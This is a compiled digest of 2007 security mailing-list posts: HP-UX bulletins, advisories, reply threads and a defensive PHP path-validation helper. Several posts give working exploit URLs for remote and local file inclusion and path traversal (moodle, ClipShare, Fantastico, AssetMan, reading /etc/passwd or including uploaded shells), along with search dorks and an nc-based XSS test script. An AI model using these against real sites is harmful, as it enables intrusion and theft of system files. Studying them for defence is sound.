Re: Php Nuke POST XSS on steroids
Paul Laudanski wrote:
> I tried both your scripts at a few locations, and all I get back is this
[cut]

Hi Paul, long time since CCC :)

It happens because HTTP headers must be on a single line; it's a formatting issue (my fault, I used to put a link to a plain-text version but this time I forgot about it). I've just created a txt version of the advisory, available here:

http://phpfi.com/214668

It should be more usable. I dunno when the demos will stop working on phpnuke.org, so I've asked wisec to upload this video, since www.ush.it has bandwidth issues:

http://www.wisec.it/ush/phpnukexss.html

Obviously, to bypass the anti-CSRF filter you have to mix the XSS with the import_request_variables() trick (this doesn't work on phpnuke.org because they have globals on, which is why I chose that domain). Consider that import_request_variables() will allow you to do much more than an XSS; this is just an example advisory on an example product.

See you,
Francesco `ascii` Ongaro
http://www.ush.it/
Remote File Include In Script moodle-1.7.1
By Hasadya Raed
Contact: RaeD [At] BsdMail [Dot] Com
--
Script: moodle-1.7.1
Dork: "Copyright (c) moodle"
--
B.Files:
utfdbmigrate.php
filter.php
--
Exploits:
http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack]
http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack]
Re: PHP-Nuke <= 8.0 Cookie Manipulation (lang)
[EMAIL PROTECTED] wrote:
> Patch:
>
> } elseif (isset($lang)) {
>     if (eregi('[A-Za-z]', $lang)) {
>         if (file_exists("language/lang-".$lang.".php")) {
>             include_once("language/lang-".$lang.".php");
>             $currentlang = $lang;
>         } else {
>             include_once("language/lang-english.php");
>             $currentlang = "english";
>         }
>     } else {
>         include_once("language/lang-english.php");
>         $currentlang = "english";
>     }
> } else {
>
> /
> Best Regards
> Aleksandar
> Programmer and Web Developer
> ///

Building on your patch you'd want to incorporate basename(). You never want to accept directory traversal attempts into variables.

Paul Laudanski, CastleCops
http://www.linkedin.com/pub/1/49a/17b
Submit Phish: www.castlecops.com/pirt
www.castlecops.com | de.castlecops.com | wiki.castlecops.com
GuppY v4.0 remote del files/index
* GuppY v4.0 remote del files/index
* By: sn0oPy
* Risk: high
* Site: http://www.freeguppy.org/
* Dork: inurl:"/guppy/index.php"
* Exploit: just add install/install.php to the script folder
  http://www.target.ma/guppy/install/install.php
  choose "Installation propre" (clean installation) >>> next >>> choose "Suppression des fichiers d'installation" (delete the installation files) >>> next >>>
* Contact: [EMAIL PROTECTED]
* Greetz: [subzero], Avg Team (forums.avenir-geopolitique.net).
* Reference: http://forums.avenir-geopolitique.net/viewtopic.php?t=2728
[security bulletin] HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00876579
Version: 2

HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-03-09
Last Updated: 2007-03-09

Potential Security Impact: Remote execution of arbitrary code.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Java Runtime Environment (JRE) and Java Developer Kit (JDK) may allow a remote user to execute arbitrary code.

References: CVE-2007-0243, CVE-2006-6745, CVE-2006-6731

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11 and B.11.23 running Java Runtime Environment (JRE) and Java Developer Kit (JDK): Release 5.0.05 (i.e., Release 1.5.0.05), Release 1.4.2.11 and earlier, Release 1.3.1.19 and earlier.

BACKGROUND
The Sun Java Runtime Environment (JRE) and Java Developer Kit (JDK) contain multiple vulnerabilities that can allow a remote, unauthenticated user to execute arbitrary code on a vulnerable system.

AFFECTED VERSIONS

NOTE: To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if a fixed revision or applicable patch is installed.

HP-UX B.11.11
HP-UX B.11.23
===
Jpi14.JPI14-COM Jpi14.JPI14-COM-DOC Jpi14.JPI14-IPF32 Jpi14.JPI14-PA11
Jdk14.JDK14-COM Jdk14.JDK14-DEMO Jdk14.JDK14-IPF32 Jdk14.JDK14-IPF64 Jdk14.JDK14-PA11 Jdk14.JDK14-PA20 Jdk14.JDK14-PA20W Jdk14.JDK14-PNV2 Jdk14.JDK14-PWV2
Jre14.JRE14-COM Jre14.JRE14-COM-DOC Jre14.JRE14-IPF32 Jre14.JRE14-IPF32-HS Jre14.JRE14-IPF64 Jre14.JRE14-IPF64-HS Jre14.JRE14-PA11 Jre14.JRE14-PA11-HS Jre14.JRE14-PA20 Jre14.JRE14-PA20-HS Jre14.JRE14-PA20W Jre14.JRE14-PA20W-HS Jre14.JRE14-PNV2 Jre14.JRE14-PNV2-H Jre14.JRE14-PWV2 Jre14.JRE14-PWV2-H
action: install revision 1.4.2.12.00 or subsequent.

Jdk15.JDK15-COM Jdk15.JDK15-DEMO Jdk15.JDK15-IPF32 Jdk15.JDK15-IPF64 Jdk15.JDK15-PA20 Jdk15.JDK15-PA20W Jdk15.JDK15-PNV2 Jdk15.JDK15-PWV2
Jre15.JRE15-COM Jre15.JRE15-COM-DOC Jre15.JRE15-IPF32 Jre15.JRE15-IPF32-HS Jre15.JRE15-IPF64 Jre15.JRE15-IPF64-HS Jre15.JRE15-PA20 Jre15.JRE15-PA20-HS Jre15.JRE15-PA20W Jre15.JRE15-PA20W-HS Jre15.JRE15-PNV2 Jre15.JRE15-PNV2-H Jre15.JRE15-PWV2 Jre15.JRE15-PWV2-H
action: install revision 1.5.0.06 or subsequent

END AFFECTED VERSIONS

NOTE: The version number returned by "$java -version" and the version returned by swlist for Java are different. For example, when "$java -version" reports 5.0.6, the version shown by swlist is 1.5.0.06.

RESOLUTION
HP is providing the following Java updates to resolve the JRE potential vulnerability. The updates are available from: http://www.hp.com/go/java

The HP website mentions Java 5.0, which can be recognized from the "swlist -l fileset" return value of 1.5.0.01.06.

These issues are addressed in the following versions of the HP Java:
* JDK and JRE 1.5.0.6 or subsequent,
* SDK and JRE 1.4.2.12 or subsequent,
* SDK and JRE 1.3.1.20 or subsequent.

If the latest version of Java is installed, older versions of Java may remain installed on the system. If these versions of Java are not needed, you may wish to remove them.

MANUAL ACTIONS: Yes - Update
For Java 1.5.0.00.00, update to Java 1.5.0.06 or subsequent.
->For Java 1.4.2.11 and earlier, update to revision 1.4.2.12 or subsequent.
For Java 1.3.1.19 or earlier, update to revision 1.3.1.20 or subsequent.

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

HISTORY:
Version: 1 (rev.1) 06 March 2007 Initial release
Version: 2 (rev.2) 09 March 2007 Corrected typo in Manual Actions, in SSRT #.

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
To: [EMAIL PROTECTED]
Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and p
RIM BlackBerry Pearl 8100 Browser DoS
RIM BlackBerry Pearl 8100 Browser DoS -- 12 March 2007

Summary:
A vulnerability has been discovered that could impact upon the availability of the BlackBerry 8100 Wireless handheld (v4.2.0.51). It is possible for a remote attacker to construct a WML page that contains an overly long string value within a link (e.g.: ). Should the page or link be accessed by BlackBerry devices, this leads to a temporary Denial of Service within the 4thPass browser component on the device, and temporary device inoperability. Normal functionality will be returned to the browser / device after an amount of time relative to the size of the link supplied, or by physically removing and reinserting the battery, thereby creating a reset.

Business Impact:
Exploitation of this issue can lead to a loss of device functionality.

Affected Product(s):
The BlackBerry 8100 (Pearl) handheld device (v4.2.0.51)

Remediation:
Upgrade to vendor patch 4.2.1. Additional details of this vulnerability are available from the vendor at www.blackberry.com/security/news.jsp

Credit:
Michael Kemp (www.clappymonkey.com)
Fantastico In all Version Cpanel 10.x <= local File Include
## Fantastico In all Version Cpanel 10.x <= local File Include ##

Note: php.ini preparations in cPanel are hypothetical, and they are also in all web servers. You must provide a username and password and log in on :2082. This breaks the strongest protection: mod_security & safe_mode:On & Disable functions: All NONE

Vulnerable Code (1):

if(is_file($userlanguage)) {
    include ( $userlanguage );
}

In http://xx.com:2082/frontend/x/fantastico/includes/load_language.php

Exploit 1:
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit 2:
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###

Vulnerable Code (2):

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig)) {
    include($localmysqlconfig);
}

in http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php and also many of the files of the program.

Exploit:
First create a directory named (/includes/) and upload Shell.php into (/includes/), then rename it mysqlconfig.local.php :D

Exploit:
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/

###
Discovered By: cyb3rt & 020
###
Special Greetings: Tryag-Team & 4lKaSrGoLd3n-Team
###
Remote File Include In ClipShare.v1.5.3
By Hasadya Raed
Contact: RaeD [At] BsdMail [Dot] Com / GunMan_Pump [At] Hotmail [Dot] Com
Script: ClipShare.v1.5.3
Dork: "Copyright © 2006 Powered By Clip-Share.Com. All rights reserved"
B.File: adodb-connection.inc.php
Exploit:
http://www.Victim.com/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack]
Re: Php Nuke POST XSS on steroids
ascii wrote:
> Php Nuke POST XSS on steroids
>
> Name              Php Nuke POST XSS on steroids
> Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and others (partially verified)
> Severity          Medium
> Vendor            http://phpnuke.org/
> Advisory          http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
> Authors           Francesco `ascii` Ongaro ([EMAIL PROTECTED])
>                   Stefano `wisec` di Paola ([EMAIL PROTECTED])
> Date              20070307
>
> --- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8
> #!/bin/bash
>
> cat > REQ << TOKEN
> POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
> Host: www.phpnuke.org
> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2
> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
> Accept-Language: en-us,en;q=0.5
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Connection: close
> Referer: http://www.phpnuke.org/modules.php?name=Downloads
> Cookie: lang=english
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 23
>
> query=token<>token
> TOKEN
>
> cat REQ | nc www.phpnuke.org 80 -vvv
> --- >8 --- >8 --- >8 --- >8 --- --- >8 --- >8 --- >8 --- >8
>
> $ ./testcase | grep "token<>token"
> DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
> www.phpnuke.org [67.15.16.43] 80 (http) open
>
> http://www.ush.it/

I tried both your scripts at a few locations, and all I get back is this:

400 Bad Request
Bad Request
Your browser sent a request that this server could not understand.
Request header field is missing ':' separator.
Gecko/20070220 Firefox/2.0.0.2
Re: Wiki Remote Authentication Bypass Vulnerability
This is the designed behavior of the application, not an "exploit" as you claim. In addition to that, the syntax used in your example URLs is specific to MediaWiki, and not common amongst all wiki apps, as you claim. Furthermore, this "exploit" does not work "100% of the time" - even if this could be called an exploit, which it clearly is not, protecting an entry and configuring levels of access are relatively common and simple tasks for Wiki administrators. Your claim that this is an access validation error is simply wrong, and is akin to saying that being able to write to a file which a user intentionally sets to mode 0777 is an error.

- Matt

[EMAIL PROTECTED] wrote:
> Wiki Remote Authentication Bypass Vulnerability
>
> The Exploit Works 100 % of the time. It really is up to the admin to add security like locking a page to prevent editing. There are two ways of having this Exploit work. One is simply add the code (example 1) after the Page you wanna test, or if that doesn't work, add Code (example 2) and Exploit code after the new page's Name! Anyone using any type of Wiki project is vulnerable.
>
> Successfully exploiting this issue allows remote attackers to gain remote administrative access to the vulnerable site's Pages. Attackers can use a browser to exploit this issue.
>
> Hackers Center Security Group (http://www.hackerscenter.com)
> Credit: Doz
> Class: Access Validation Error
> Remote: Yes
> Vendor: http://www.wiki.org/
> Version: N/A
> Exploit: ?action=edit
> Example 1: http://www.Site.com/wiki/Main_Page?action=edit
> Example 2: http://www.Site.com/wiki/Hacked?action=edit
> Proof of Concept: (Concealed)
>
> Security researcher? Join us: mail Zinho at zinho at hackerscenter.com

--
/*
 * Matt D. Harris <[EMAIL PROTECTED]>
 * Solitox Networks - Lead Project Engineer
 */
AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
| AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
|
| Script: AssetMan
|
| Version: 2.4a
|
| URL: http://www.bctree.com/~assetman/assetman-2.4a.zip
|
| Discovered by: BorN To K!LL
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
| Bug in:
| download_pdf.php
|
| Code:
| readfile($_GET["pdf_file"]);
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
| ExploiT:
| ~
| wWw.SiTe.cOm/[path]/download_pdf.php?pdf_file=../../../../etc/passwd
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
| GreeTz 2:
| Dr.2 - str0ke - AsbMay .
|
| KuW SeC AsbMay's Group
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
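The PHP-Nuke lang patch above, Fantastico's load_language.php and AssetMan's download_pdf.php all hand a request value straight to include()/readfile(). The helper below is an added example written for this digest (it is not code from any of those projects; all function names and the temporary directory are hypothetical) showing one file-selection routine that serves both the language-include and the PDF-download case, with the anchored pattern, basename() and realpath() prefix check the PHP-Nuke reply asks for:

```php
<?php
declare(strict_types=1);

// Hypothetical helper (added example, not code from PHP-Nuke, Fantastico or
// AssetMan): map an untrusted name to one file inside a fixed directory.
function resolve_in_dir(string $baseDir, string $userValue, string $prefix, string $ext): ?string
{
    // 1. Accept only a short, anchored token. The posted patch's
    //    eregi('[A-Za-z]', $lang) is not anchored, so it merely requires one
    //    letter somewhere in the value and lets "../../etc/passwd" through.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $userValue)) {
        return null;
    }
    // 2. basename(), as the reply suggests. After the anchored match it can no
    //    longer change anything, which is exactly the property we want.
    $name = basename($userValue);

    // 3. The caller, not the request, supplies directory, prefix and extension,
    //    so absolute paths and embedded NUL bytes (which old PHP versions
    //    treated as the end of the path) never reach the filesystem.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $prefix . $name . $ext);

    // 4. realpath() resolves symlinks and "..": insist the result still lives
    //    under $base and is a regular file, not a directory or a device node.
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// PHP-Nuke style language loader: unknown or malformed values fall back to english.
function load_language(string $langDir, ?string $lang): string
{
    $file = $lang === null ? null : resolve_in_dir($langDir, $lang, 'lang-', '.php');
    if ($file === null) {
        $lang = 'english';
        $file = $langDir . '/lang-english.php';
    }
    include_once $file;
    return $lang;
}

// AssetMan style download: only *.pdf below $pdfDir, never a caller-supplied path.
function send_pdf(string $pdfDir, string $requested): bool
{
    $file = resolve_in_dir($pdfDir, $requested, '', '.pdf');
    if ($file === null) {
        http_response_code(404);
        return false;
    }
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($file);
    return true;
}

// Self-check against a constructed temporary language directory.
$dir = sys_get_temp_dir() . '/langdemo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/lang-english.php", "<?php // constructed sample language file\n");
file_put_contents("$dir/lang-italian.php", "<?php // constructed sample language file\n");

$cases = [                                    // input => language actually loaded
    'italian'                => 'italian',    // valid name
    '../../../../etc/passwd' => 'english',    // traversal (passes the eregi() test)
    '/home/user/shell'       => 'english',    // absolute path, as in the Fantastico report
    "italian\0"              => 'english',    // NUL byte
    'klingon'                => 'english',    // well-formed, but no such file
];
foreach ($cases as $input => $expected) {
    $got = load_language($dir, $input);
    printf("%-30s -> %-8s %s\n", json_encode($input), $got, $got === $expected ? 'ok' : 'FAIL');
}
array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

Remote includes such as the moodle, ClipShare and PHP Photo Album items in this digest are not stopped by path checks alone; they also need allow_url_include (allow_url_fopen on PHP of that era) switched off.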
Remote File Include In Script PHP Photo Album
By Hasadya Raed
Contact: [EMAIL PROTECTED]
-
Script: PHP Photo Album
Dork: "Powered by PHP Photo Album"
-
B.File: common.php
--
Exploit:
http://www.Victim.com/Path_Script/common.php?db_file=[Shell-Attack]
Wiki Remote Authentication Bypass Vulnerability
Wiki Remote Authentication Bypass Vulnerability

The Exploit Works 100 % of the time. It really is up to the admin to add security like locking a page to prevent editing. There are two ways of having this Exploit work. One is simply add the code (example 1) after the Page you wanna test, or if that doesn't work, add Code (example 2) and Exploit code after the new page's Name! Anyone using any type of Wiki project is vulnerable.

Successfully exploiting this issue allows remote attackers to gain remote administrative access to the vulnerable site's Pages. Attackers can use a browser to exploit this issue.

Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz
Class: Access Validation Error
Remote: Yes
Vendor: http://www.wiki.org/
Version: N/A
Exploit: ?action=edit
Example 1: http://www.Site.com/wiki/Main_Page?action=edit
Example 2: http://www.Site.com/wiki/Hacked?action=edit
Proof of Concept: (Concealed)

Security researcher? Join us: mail Zinho at zinho at hackerscenter.com
Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
Dear Thor (Hammer of God),

You are wrong, at least for Windows XP/2003. There is a common temporary directory, %WINDIR%\Temp. It's used as %TEMP% if an application is launched without local logon, e.g. a system service. For example, services launched with the LocalSystem account will have these environment variables:

SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\LocalService

You can find it's really used, because it's never empty. I see, e.g., files related to different Intel drivers, VMWare, Microsoft .Net framework, Exchange and Sharepoint. Also, I remember I had problems with securing the ABN AMRO Bank client software installation, because it uses %WINDIR%\Temp for some reason.

And now the most exciting part: Users have permission to create files in this directory, that is, a pre-open attack is possible.

--Saturday, March 10, 2007, 7:28:27 PM, you wrote to bugtraq@securityfocus.com:

THoG> Apps utilizing temporary files should always use the TEMP or TMP environment
THoG> variables, not a hard-coded path. And by default, each user has their own
THoG> temp directory created (in XP/Server it is "\Documents and
THoG> Settings\username\Local Settings\temp" and in Vista it is
THoG> "\Users\username\AppData\Local\Temp") that only they have permissions to
THoG> (with SYSTEM and Administrators, of course). It's not like there is some
THoG> global "Full Control" temp directory created by default.
THoG>
THoG> t
THoG>
THoG> - Original Message -
THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]>
THoG> To: "Tim" <[EMAIL PROTECTED]>
THoG> Cc: ;
THoG> Sent: Friday, March 09, 2007 9:42 AM
THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
THoG> management security issues
THoG>
THoG> So, let me get this. An app storing sensitive data doesn't make its own
THoG> temp storage folders in a secure location, and instead relies upon one
THoG> of the few folders in Windows that all users have Full Control to, and
THoG> this is a Windows problem? In Linux, if an app uses \tmp, is that a
THoG> Linux issue?
THoG>
THoG> Sounds like a developer issue to me.
THoG>
THoG> Roger
THoG>
THoG> -Original Message-
THoG> From: Tim [mailto:[EMAIL PROTECTED]
THoG> Sent: Friday, March 09, 2007 11:20 AM
THoG> To: Roger A. Grimes
THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
THoG> management security issues
THoG>
THoG> I find your assessment somewhat short-sighted. I have conducted code
THoG> reviews on several commercial apps which use C:\TEMP in very insecure
THoG> ways to store sensitive data. It seems some of these attacks would be
THoG> possible in those situations.
THoG>
THoG> Sure, Windows is already pathetically insecure against attackers
THoG> already on the local system, but this would be yet another attack
THoG> vector.
THoG>
THoG> tim

--
~/ZARAZA http://securityvulns.com/
Smack the ENIACs in the face! (Lem)
[security bulletin] HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00717872
Version: 2

HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-03-05
Last Updated: 2007-03-05

Potential Security Impact: Remote Unauthorized Access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX when running Service Locator Protocol (SLP). The vulnerability could be exploited by a remote user of Service Locator Protocol (SLP) for unauthorized access.

References: SUSE-SA:2005:015

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23

BACKGROUND
The SLP implementation on HP-UX is based on OpenSLP version 0.8.0 developed by Caldera Systems, Inc.

To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

->HP-UX B.11.11
===
upgrade_SLP.INETSVCS-RUN
action: install revision 1.2 or subsequent
->URL: http://software.hp.com

HP-UX B.11.23
===
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33508 or subsequent

END AFFECTED VERSIONS

RESOLUTION
HP has made the following patch and web upgrade available to resolve this issue.

B.11.23 PHNE_33508 or subsequent
The patch can be retrieved from: http://itrc.hp.com

->The B.11.11 SLP Revision 1.2 update can be retrieved from: http://software.hp.com

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

MANUAL ACTIONS: Yes - Update
HP-UX B.11.11: Update to HP-UX SLP Revision 1.2 or subsequent
HP-UX B.11.23: No manual actions

HISTORY:
Version: 1 (rev.1) 25 September 2006 Initial release
Version: 2 (rev.2) 06 March 2007 Updated web upgrade location for B.11.11

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
To: [EMAIL PROTECTED]
Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all u
Re: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
2 things:

My point is what apps SHOULD do: use the "user" temp variable, not the system temp variable, if you want to easily have inherited, user-based security. Not sure why your ABN AMRO client makes its files in %WINDIR%\temp, but that's not necessary. It probably requires local admin too, given that.

Secondly, I said there is not a "global Full Control" directory, and there is not. The %WINDIR%\Temp directory has "special" permissions. For users, it is only Traverse Folder/Execute File, Create Files/Write Data, and Create Folders/Append Data. Not List Folder/Read Data, no read attributes, no write attributes, no delete, etc, etc. And all subfolders in Temp inherit those permissions. I know it's used extensively by system and admin installation, but that's not my point at all.

Someone chimed in about C:\temp and sensitive data, and blah blah, so I simply stated that user variable usage for temp files mitigates that. Also, there is no "Global Full Control" directory created by default for temp files, and there's not. Sure you can create one if you want and use that (which obviously someone did for C:\temp because it does not exist by default) but that's more of Roger's point in that "if you do things insecurely and without thinking, then someone can take advantage of that." And I think he's right on that.

But as Mark said, the overall issue is interesting at some level, particularly if you can leverage it even with limited permissions in \windows\temp, though I also think many many things must go "wrong" first.

But, that being said, I've seen enough of your posts to know that you know what you are doing, so I have respect for your work even though I may not totally agree all the time.

t

Learn to secure your Microsoft installations with Tim Mullen's "Microsoft Ninjitsu Black Belt Edition" at Blackhat Vegas. Registration open now.
http://www.blackhat.com/html/bh-usa-07/train-bh-us-07-tm-ms-bbe.html

- Original Message -
From: "3APA3A" <[EMAIL PROTECTED]>
To: "Thor (Hammer of God)" <[EMAIL PROTECTED]>
Cc: ; "Roger A. Grimes" <[EMAIL PROTECTED]>; "Tim" <[EMAIL PROTECTED]>;
Sent: Saturday, March 10, 2007 2:32 PM
Subject: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

[cut]